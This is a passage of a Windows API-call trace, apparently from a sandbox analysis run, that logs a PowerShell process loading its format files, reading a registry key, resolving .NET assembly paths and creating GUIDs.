	[0542.339] ReadFile (in: hFile=0x2ec, lpBuffer=0x3604ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3604ce8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.339] ReadFile (in: hFile=0x2ec, lpBuffer=0x3604ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3604ce8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.340] ReadFile (in: hFile=0x2ec, lpBuffer=0x3604ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3604ce8*, lpNumberOfBytesRead=0x24d0b8*=0xfb2, lpOverlapped=0x0) returned 1
	[0542.341] ReadFile (in: hFile=0x2ec, lpBuffer=0x3604402, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3604402*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0542.341] ReadFile (in: hFile=0x2ec, lpBuffer=0x3604ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3604ce8*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0542.341] CloseHandle (hObject=0x2ec) returned 1
	[0542.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0542.341] SetErrorMode (uMode=0x1) returned 0x1
	[0542.341] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0542.341] SetErrorMode (uMode=0x1) returned 0x1
	[0542.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0542.342] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d148 | out: phkResult=0x24d148*=0x2ec) returned 0x0
	[0542.342] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d0cc, lpData=0x0, lpcbData=0x24d0c8*=0x0 | out: lpType=0x24d0cc*=0x1, lpData=0x0, lpcbData=0x24d0c8*=0x56) returned 0x0
	[0542.342] CoTaskMemAlloc (cb=0x5a) returned 0x1b95b450
	[0542.342] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d09c, lpData=0x1b95b450, lpcbData=0x24d098*=0x56 | out: lpType=0x24d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d098*=0x56) returned 0x0
	[0542.342] CoTaskMemFree (pv=0x1b95b450) 
	[0542.342] RegCloseKey (hKey=0x2ec) returned 0x0
	[0542.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0542.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0542.352] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd0204436, Data2=0xa8cb, Data3=0x45a8, Data4=([0]=0x9c, [1]=0xfd, [2]=0x88, [3]=0x10, [4]=0x60, [5]=0xb7, [6]=0x10, [7]=0x4b))) returned 0x0
	[0542.355] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd70e99e0, Data2=0xf891, Data3=0x4983, Data4=([0]=0xb1, [1]=0xb, [2]=0xd1, [3]=0x6, [4]=0x70, [5]=0x24, [6]=0x37, [7]=0x63))) returned 0x0
	[0542.356] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x5c820923, Data2=0x3bd0, Data3=0x4e1b, Data4=([0]=0x82, [1]=0xf2, [2]=0xbc, [3]=0x9c, [4]=0xdc, [5]=0x1, [6]=0xa8, [7]=0xa9))) returned 0x0
	[0542.356] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x708a16e4, Data2=0xc118, Data3=0x4402, Data4=([0]=0x8f, [1]=0x76, [2]=0x30, [3]=0x93, [4]=0x6e, [5]=0xcf, [6]=0xe1, [7]=0x71))) returned 0x0
	[0542.357] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x49d903db, Data2=0x9997, Data3=0x4e53, Data4=([0]=0x83, [1]=0xf6, [2]=0xd8, [3]=0xec, [4]=0xa9, [5]=0xac, [6]=0x80, [7]=0x19))) returned 0x0
	[0542.358] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x6cac314f, Data2=0x3a00, Data3=0x4606, Data4=([0]=0x9d, [1]=0x1a, [2]=0x5f, [3]=0x4e, [4]=0xe3, [5]=0xc9, [6]=0x74, [7]=0xb4))) returned 0x0
	[0542.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0542.359] SetErrorMode (uMode=0x1) returned 0x1
	[0542.359] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0542.359] GetFileType (hFile=0x2ec) returned 0x1
	[0542.359] SetErrorMode (uMode=0x1) returned 0x1
	[0542.359] GetFileType (hFile=0x2ec) returned 0x1
	[0542.359] ReadFile (in: hFile=0x2ec, lpBuffer=0x3650a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3650a48*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.361] ReadFile (in: hFile=0x2ec, lpBuffer=0x3650a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3650a48*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.361] ReadFile (in: hFile=0x2ec, lpBuffer=0x3650a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3650a48*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.362] ReadFile (in: hFile=0x2ec, lpBuffer=0x3650a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3650a48*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.363] ReadFile (in: hFile=0x2ec, lpBuffer=0x3650a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3650a48*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.363] ReadFile (in: hFile=0x2ec, lpBuffer=0x3650a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3650a48*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.363] ReadFile (in: hFile=0x2ec, lpBuffer=0x3650a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3650a48*, lpNumberOfBytesRead=0x24d0b8*=0xaca, lpOverlapped=0x0) returned 1
	[0542.363] ReadFile (in: hFile=0x2ec, lpBuffer=0x365007a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x365007a*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0542.363] ReadFile (in: hFile=0x2ec, lpBuffer=0x3650a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3650a48*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0542.364] CloseHandle (hObject=0x2ec) returned 1
	[0542.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0542.364] SetErrorMode (uMode=0x1) returned 0x1
	[0542.364] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0542.364] SetErrorMode (uMode=0x1) returned 0x1
	[0542.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0542.365] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d148 | out: phkResult=0x24d148*=0x2ec) returned 0x0
	[0542.365] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d0cc, lpData=0x0, lpcbData=0x24d0c8*=0x0 | out: lpType=0x24d0cc*=0x1, lpData=0x0, lpcbData=0x24d0c8*=0x56) returned 0x0
	[0542.365] CoTaskMemAlloc (cb=0x5a) returned 0x1b95b450
	[0542.365] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d09c, lpData=0x1b95b450, lpcbData=0x24d098*=0x56 | out: lpType=0x24d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d098*=0x56) returned 0x0
	[0542.365] CoTaskMemFree (pv=0x1b95b450) 
	[0542.365] RegCloseKey (hKey=0x2ec) returned 0x0
	[0542.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0542.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0543.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0543.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0543.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0543.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0543.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0543.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0543.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0543.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0543.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0543.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0543.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0543.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0543.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0543.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0543.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0544.200] VirtualQuery (in: lpAddress=0x24bbe0, lpBuffer=0x24caa0, dwLength=0x30 | out: lpBuffer=0x24caa0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0544.201] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x24843f53, Data2=0x858b, Data3=0x499c, Data4=([0]=0x80, [1]=0xc3, [2]=0x41, [3]=0x51, [4]=0x1f, [5]=0x52, [6]=0x71, [7]=0xf4))) returned 0x0
	[0544.202] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x218ce884, Data2=0xf97d, Data3=0x4349, Data4=([0]=0xbd, [1]=0x18, [2]=0x3b, [3]=0x5e, [4]=0x63, [5]=0xa, [6]=0x2, [7]=0xed))) returned 0x0
	[0544.203] VirtualQuery (in: lpAddress=0x24bd90, lpBuffer=0x24cc50, dwLength=0x30 | out: lpBuffer=0x24cc50*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0544.204] VirtualQuery (in: lpAddress=0x24bd90, lpBuffer=0x24cc50, dwLength=0x30 | out: lpBuffer=0x24cc50*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0544.205] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x811ed20f, Data2=0xdc64, Data3=0x44fb, Data4=([0]=0x8e, [1]=0x8c, [2]=0x68, [3]=0x6c, [4]=0xa8, [5]=0x9f, [6]=0xab, [7]=0xee))) returned 0x0
	[0544.208] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x4bc643d6, Data2=0x240c, Data3=0x4c3e, Data4=([0]=0xaf, [1]=0xac, [2]=0x34, [3]=0xbe, [4]=0xe0, [5]=0x76, [6]=0x50, [7]=0x68))) returned 0x0
	[0544.209] VirtualQuery (in: lpAddress=0x24bfe0, lpBuffer=0x24cea0, dwLength=0x30 | out: lpBuffer=0x24cea0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.269] VirtualQuery (in: lpAddress=0x24bd20, lpBuffer=0x24cbe0, dwLength=0x30 | out: lpBuffer=0x24cbe0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.278] VirtualQuery (in: lpAddress=0x24bd20, lpBuffer=0x24cbe0, dwLength=0x30 | out: lpBuffer=0x24cbe0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0545.279] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x2d27cef3, Data2=0x45f4, Data3=0x45d7, Data4=([0]=0x86, [1]=0x5e, [2]=0x1b, [3]=0x71, [4]=0x96, [5]=0x34, [6]=0xb3, [7]=0xe4))) returned 0x0
	[0545.279] VirtualQuery (in: lpAddress=0x24bfe0, lpBuffer=0x24cea0, dwLength=0x30 | out: lpBuffer=0x24cea0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0545.280] VirtualQuery (in: lpAddress=0x24be00, lpBuffer=0x24ccc0, dwLength=0x30 | out: lpBuffer=0x24ccc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0545.281] VirtualQuery (in: lpAddress=0x24b650, lpBuffer=0x24c510, dwLength=0x30 | out: lpBuffer=0x24c510*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0545.282] VirtualQuery (in: lpAddress=0x24b650, lpBuffer=0x24c510, dwLength=0x30 | out: lpBuffer=0x24c510*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0545.283] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xafd8b451, Data2=0x8da2, Data3=0x44b6, Data4=([0]=0x93, [1]=0xb1, [2]=0x4f, [3]=0xf9, [4]=0x84, [5]=0xc2, [6]=0x1d, [7]=0x1b))) returned 0x0
	[0545.283] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x496adfe2, Data2=0x6e39, Data3=0x473e, Data4=([0]=0x8a, [1]=0x6e, [2]=0x74, [3]=0x29, [4]=0x9, [5]=0x18, [6]=0x9d, [7]=0x6e))) returned 0x0
	[0545.284] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0545.284] GetFileType (hFile=0x31c) returned 0x1
	[0545.284] SetErrorMode (uMode=0x1) returned 0x1
	[0545.284] GetFileType (hFile=0x31c) returned 0x1
	[0545.284] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.285] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.285] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.285] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.286] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.286] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.286] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.286] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
